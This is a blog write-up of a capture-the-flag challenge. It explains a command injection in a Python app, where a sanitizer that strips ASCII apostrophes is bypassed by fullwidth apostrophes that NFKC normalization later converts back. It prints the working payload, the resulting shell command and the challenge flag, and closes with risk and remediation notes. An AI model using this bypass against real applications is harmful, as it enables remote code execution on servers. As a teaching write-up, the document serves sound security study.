Cyb3r7hr347's Blog
Go back

Ghost Whisper - Command Injection via Unicode Normalization

Writeup for the Ghost Whisper challenge on YesWeHack.

Table of contents

Open Table of contents

Description

The application uses the user input which is parsed directly into the os.popen() method to run shell commands on the underlying system. The processing workflow of whisperMsg is vulnerable to command injection.

The code first attempts to sanitize the input by replacing ASCII apostrophe (') with an underscore and after that normalize the string using unicodedata.normalize("NFKC", ...).

An attacker can provide a Unicode homoglyph, such as the Fullwidth Apostrophe (). The replace function trying to replace the apostrophe fails to find this character. But after this step, the code converts this compatibility character into the standard ASCII apostrophe, which is dangerous and provides a way to format the payload for execution.

Exploitation

Payload Crafting

The attacker creates a payload using the Fullwidth Apostrophe (, U+FF07) instead of the standard apostrophe (', U+0027).

Payload:

'; $FLAG ; echo'

Filter Bypass

  1. The application’s sanitizer (whisperMsg.replace("'", "_")) runs first. It scans for the standard apostrophe, finds none, and lets the payload pass through unchanged.

  2. Malicious Normalization: The payload is then passed to unicodedata.normalize("NFKC", ...). This function converts all characters into standard ' characters. The whisperMsg variable now contains the string: '; $FLAG ;'

  3. Command Execution: This malicious string is inserted into the os.popen command. The shell receives and executes the following:

    echo -n ''; $FLAG ; echo '' | hexdump

  4. Data Exfiltration: The shell executes the injected $FLAG command, printing the flag’s value to standard output, which is then piped to hexdump and displayed to the attacker.

PoC

Submit the following payload as input whisperMsg:

'; $FLAG ; echo'

Flag: FLAG{Gh0s7_S4y_BOOO000oooo}

Risk

The vulnerability allows Remote Code Execution (RCE) on the server. This exposes the application server to a critical risk, allowing the attacker to run arbitrary shell commands with the same permission as the python application.

This vulnerability affects the confidentiality, integrity and availability of the server and customer data.

Remediation

The best way to prevent this vulnerability is to not rely on the execution of OS commands from the application-layer code.

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Previous Post
APICrash - Race Condition Vulnerability
Next Post
AppSecMaster - Blind XSS to Privilege Escalation